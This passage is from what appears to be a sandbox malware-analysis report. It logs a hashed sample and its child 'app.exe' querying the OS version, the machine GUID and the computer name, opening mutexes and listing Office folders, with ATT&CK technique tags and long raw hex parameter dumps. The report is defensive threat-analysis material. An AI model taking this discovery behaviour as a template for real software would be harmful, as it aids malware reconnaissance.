\"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000095e17b77b833ba00fefffffff5f67f77634d807758222000a857e36c4046e300b2f47f77d4dad777dce112000000e26c0000e26c804d8077f0dad777e0000000e000e26c0000000048e11200e412e26cdce212000000000001000000ace1120040f57f77000000000000000098e11200 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004436)\n \"app.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb94772865370000f0fd7f9a5c807700e0fd7f98c2120044f0fd7f00000000400000003f0000002000000000f0fd7f8cc21200c15c8077608287772000000000f0fd7f9a5c807700e0fd7fb0c2120057897f778083877713177875d8eb9477 (UID: 00000000-00004636)\n \"app.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b20310000644e0302100000001c000000b8da1200bcdb12007ac8726f08000000ac4e7e7793797775ffffffff20db1200000000000cdb12000010000004000000002000002cdb1200bf797775ffffffff00006a0000006a00001000000400000064db1200000013006ee9466f00006a00ff000000 (UID: 00000000-00004636)\n \"app.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100205061636b20310000644e0302100000001c000000b8da1200bcdb12007ac8726f08000000ac4e7e7793797775ffffffff20db1200000000000cdb12000010000004000000002000002cdb1200bf797775ffffffff00006a0000006a00001000000400000064db1200000013006ee9466f (UID: 00000000-00004636)\n \"app.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b203100205061636b203100205061636b20310000644e0302100000001c000000b8da1200bcdb12007ac8726f08000000ac4e7e7793797775ffffffff20db1200000000000cdb12000010000004000000002000002cdb1200bf797775ffffffff00006a0000006a00001000000400000064db1200 (UID: 00000000-00004636)\n \"app.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000095e17b77a79bbd00fefffffff5f67f77634d807760232b00a857e36c4046e300b2f47f77cb48d077dcdb12000000e26c0000e26c804d8077ef48d077e0000000e000e26c0000000048db1200e412e26cdcdc12000000000001000000acdb120040f57f77000000000000000098db1200 (UID: 00000000-00004636)\n \"app.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004636)\n \"app.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004636)\n \"app.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b20310000a40e0502100000001c000000c8d81200ccd912007ac8726f08000000ac4e7e7793797775ffffffff30d91200000000001cd912000010000004000000002000003cd91200bf797775ffffffff0000a6010000a601001000000400000074d91200000013006ee9466f0000a601ff000000 (UID: 00000000-00004636)\n \"app.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100205061636b20310000a40e0502100000001c000000c8d81200ccd912007ac8726f08000000ac4e7e7793797775ffffffff30d91200000000001cd912000010000004000000002000003cd91200bf797775ffffffff0000a6010000a601001000000400000074d91200000013006ee9466f (UID: 00000000-00004636)\n \"app.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b203100205061636b203100205061636b20310000a40e0502100000001c000000c8d81200ccd912007ac8726f08000000ac4e7e7793797775ffffffff30d91200000000001cd912000010000004000000002000003cd91200bf797775ffffffff0000a6010000a601001000000400000074d91200 (UID: 00000000-00004636)\n \"app.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000095e17b77a79bbd00fefffffff5f67f77634d807760232b00a857996c40469900b2f47f77db4ad077ecd912000000986c0000986c804d8077ff4ad077e0000000e000986c0000000058d91200e412986cecda12000000000001000000bcd9120040f57f770000000000000000a8d91200 (UID: 00000000-00004636)\n \"app.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b20310000e4070502100000001c000000c8d81200ccd912007ac8726f08000000ac4e7e7793797775ffffffff30d91200000000001cd912000010000004000000002000003cd91200bf797775ffffffff0000b8010000b801001000000400000074d91200000013006ee9466f0000b801ff000000 (UID: 00000000-00004636)\n \"app.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100205061636b20310000e4070502100000001c000000c8d81200ccd912007ac8726f08000000ac4e7e7793797775ffffffff30d91200000000001cd912000010000004000000002000003cd91200bf797775ffffffff0000b8010000b801001000000400000074d91200000013006ee9466f (UID: 00000000-00004636)\n \"app.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b203100205061636b203100205061636b20310000e4070502100000001c000000c8d81200ccd912007ac8726f08000000ac4e7e7793797775ffffffff30d91200000000001cd912000010000004000000002000003cd91200bf797775ffffffff0000b8010000b801001000000400000074d91200 (UID: 00000000-00004636)\n \"app.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000095e17b77a79bbd00fefffffff5f67f77634d807760232b00a857e36c4046e300b2f47f77db4ad077ecd912000000e26c0000e26c804d8077ff4ad077e0000000e000e26c0000000058d91200e412e26cecda12000000000001000000bcd9120040f57f770000000000000000a8d91200 (UID: 00000000-00004636)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004436)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600bee28df628dd12006d8230778cc6240004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000650062006300340066003600390039003600640031003700390031006500610064003800390061003000380064006100650032006500620064003800370065003300390063003900390039003700630030003400360031003300630034003600340035002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b7f7780fcd777d8eb9477ac0120000000200000000000000000001d006b0003000000000000000000000000000000000000001e006600030000000000000000000000d86f200000000000200000000000000000000000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360052e98df604d712006d8230770488270004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360052e98df604d712006d823077248a270004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f83b0000ff07000000002000000000007f070000c4002000a82f2000d22d000074d6120067e57c77000020005091270000000000000020000000000050912700000000007e2d005380000000f8932700c4002000e8d52600003b00000000200000000000509127000012000000002000488e2700f83b0000ff07000000002000000000007f070000c40020007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360052e98df604d712006d823077cc8b270004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f83b0000ff07000000002000000000007f070000c4002000a82f20009d2d000074d6120067e57c7700002000f8922700000000000000200000000000f892270000000000492d006480000000a0952700c400200070d52600003b00000000200000000000f89227000012000000002000f08f2700f83b0000ff07000000002000000000007f070000c40020007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360052e98df604d712006d823077fc8c270004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f83b0000ff07000000002000000000007f070000c4002000a82f2000772d000074d6120067e57c7700002000289427000000000000002000000000002894270000000000232d000e80000000d0962700c400200070d52600003b0000000020000000000028942700001200000000200020912700f83b0000ff07000000002000000000007f070000c40020007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360052e98df604d712006d8230772c8e270004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f83b0000ff07000000002000000000007f070000c4002000a82f2000512d000074d6120067e57c7700002000589527000000000000002000000000005895270000000000fd2c00d18000000000982700c4002000d8d52600003b0000000020000000000058952700001200000000200050922700f83b0000ff07000000002000000000007f070000c40020007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360052e98df604d712006d823077548f270004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f83b0000ff07000000002000000000007f070000c4002000a82f20002c2d000074d6120067e57c7700002000809627000000000000002000000000008096270000000000d82c00f48000000028992700c400200070d52600003b0000000020000000000080962700001200000000200078932700f83b0000ff07000000002000000000007f070000c40020007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360052e98df604d712006d8230778490270004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f83b0000ff07000000002000000000007f070000c4002000a82f2000062d000074d6120067e57c7700002000b0972700000000000000200000000000b097270000000000b22c009e80000000589a2700c4002000d8d52600003b00000000200000000000b09727000012000000002000a8942700f83b0000ff07000000002000000000007f070000c40020007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360052e98df604d712006d823077b491270004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f83b0000ff07000000002000000000007f070000c4002000a82f2000e02c000074d6120067e57c7700002000e0982700000000000000200000000000e0982700000000008c2c00a080000000889b2700c4002000d8d52600003b00000000200000000000e09827000012000000002000d8952700f83b0000ff07000000002000000000007f070000c40020007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360052e98df604d712006d823077dc92270004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f83b0000ff07000000002000000000007f070000c4002000a82f2000bb2c000074d6120067e57c7700002000089a2700000000000000200000000000089a270000000000672c004b80000000b09c2700c400200070d52600003b00000000200000000000089a2700001200000000200000972700f83b0000ff07000000002000000000007f070000c40020007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360052e98df604d712006d8230771494270004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000270044e01200b344216c05000000000000000000000000000000000000000000000000000000c40100000000000000000000000000005ce71200984094f600e5120000e512005ecba775c401000000000000005da5755ce712000e5da575f4e21200dcaaa975010000000000000072000000ffffffffffffffff7ce012007802000000000000250000007ce012007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360002df8df6d4e012006d82307734a5270004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff0400d30033000000620ba77500000000d86f200000000000500000007ca7270002000000086a2300000000000100000850b9260000742000380ba77508df120002000000bcdf12003f08ef7602000000086a2300000000000100001888fbee76acdf1200c81ca97582e1120095fbee76e0e01200086a230000000000000000000000000068e01200000020007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600bedf8df628e012006d82307734a5270004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360096e68df640d912006d82307754aa270004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000d4004402000079007300740065006d00330032005c000900cf004402000069002e0064006c00d86f20000000000020000000ecddd7770000000060ec2500c86c2000e86d2000c8f327009071200018000000ece512000000000094e7120095e17b774027ba00feffffffff2b7f779a2a7f77989e27000000000000000000feffffff00000000e0eb2500c86c2000e46d2000989e2700287120000000000038e612001bbc85f694e7120095e17b774027ba00feffffffff2b7f779a2a7f772c9b8576000000002c9b8576d875f6760200000000000000989e2700c8f32700989e2700 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700bcda1200b344216c0500000000000000000000000000000000000000000000000000000020030000000000000000000000000000d4e11200104594f678df120078df12005ecba7752003000000000000005da575d4e112000e5da5756cdd1200dcaaa975010000000000000072000000fffffffffffffffff4da1200780200000000000025000000f4da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036009ae48df64cdb12006d8230778c9b2a0004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff23007b0034000000620ba77500000000d86f20000000000050000000c41b2a0002000000086a23000000000001000008a0c1280000742000380ba77580d912000200000034da12003f08ef7602000000086a2300000000000100001888fbee7624da1200c81ca975fadb120095fbee7658db1200086a2300000000000000000000000000e0da1200000020007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360036e58df6a0da12006d8230778c9b2a0004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002eec8df6b8d312006d8230778c9b2a0004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000028005cc51200b344216c090000000000000000000000000000000000000000000000000000002003000000000000000000000000000074cc1200705a94f618ca120018ca12005ecba7752003000000000000005da57574cc12000e5da5750cc81200dcaaa97501000000000000007a000000ffffffffffffffff94c5120078020000000000002500000094c512007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007afa8df6ecc512006d8230776cf52b0004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000002000002000001030250054c5120004647f7738012000e0637f7704fed7770000000000002000183025000000000082287f77340000c080c41200001b00000000200058f52b00f83b0000ff07000000002000000000007f070000c4002000a82f20005131000000c5120067e57c770000200058f52b000000000000002000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360096fa8df640c512006d8230772430250004010000 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008e818df658be12006d8230776cf52b0004010000 (UID: 00000000-00004436)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"app.exe\" called \"OpenMutexA\" with parameter \"d0ecea2d4851543137562d537973\" - (UID: 00000000-00002452)\n \"app.exe\" called \"OpenMutexA\" with parameter \"d0ecea2d4851543137562d57\" - (UID: 00000000-00002452)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"IsWow64Process\" with parameter \"4436\" - (UID: 00000000-00004436)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004436)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004436)\n \"app.exe\" called \"GetForegroundWindow\" (UID: 00000000-00002452)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004436)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"app.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-189", "relevance": 5, "name": "Calls an APIs used to retrieve process information", "description": "Observed import api \"OpenProcessToken\" which can be \"used to retrieve process information\" [Source: fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645]\n Observed import api \"OpenProcessToken\" which can be \"used to retrieve process information\" [Source: app.exe]", "origin": "Static Parser", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-13", "type": 3, "relevance": 3, "name": "Reads the windows installation date", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\"; Key: \"INSTALLDATE\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"app.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\APP.EXE\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\APP.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindFirstFileW\" with parameter %PROGRAMFILES%\\MICROS~3\\Office14\\*.* (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter 1033 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter 1036 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter 3082 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter ACCDDS.DLL (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter ACCDDSF.DLL (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter ACCDDSLM.DLL (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter AccessWeb (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter ACCICONS.EXE (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter ACCVDT.DLL (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter ACCWIZ (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter ACCWIZ.DLL (UID: 00000000-00004436)\n 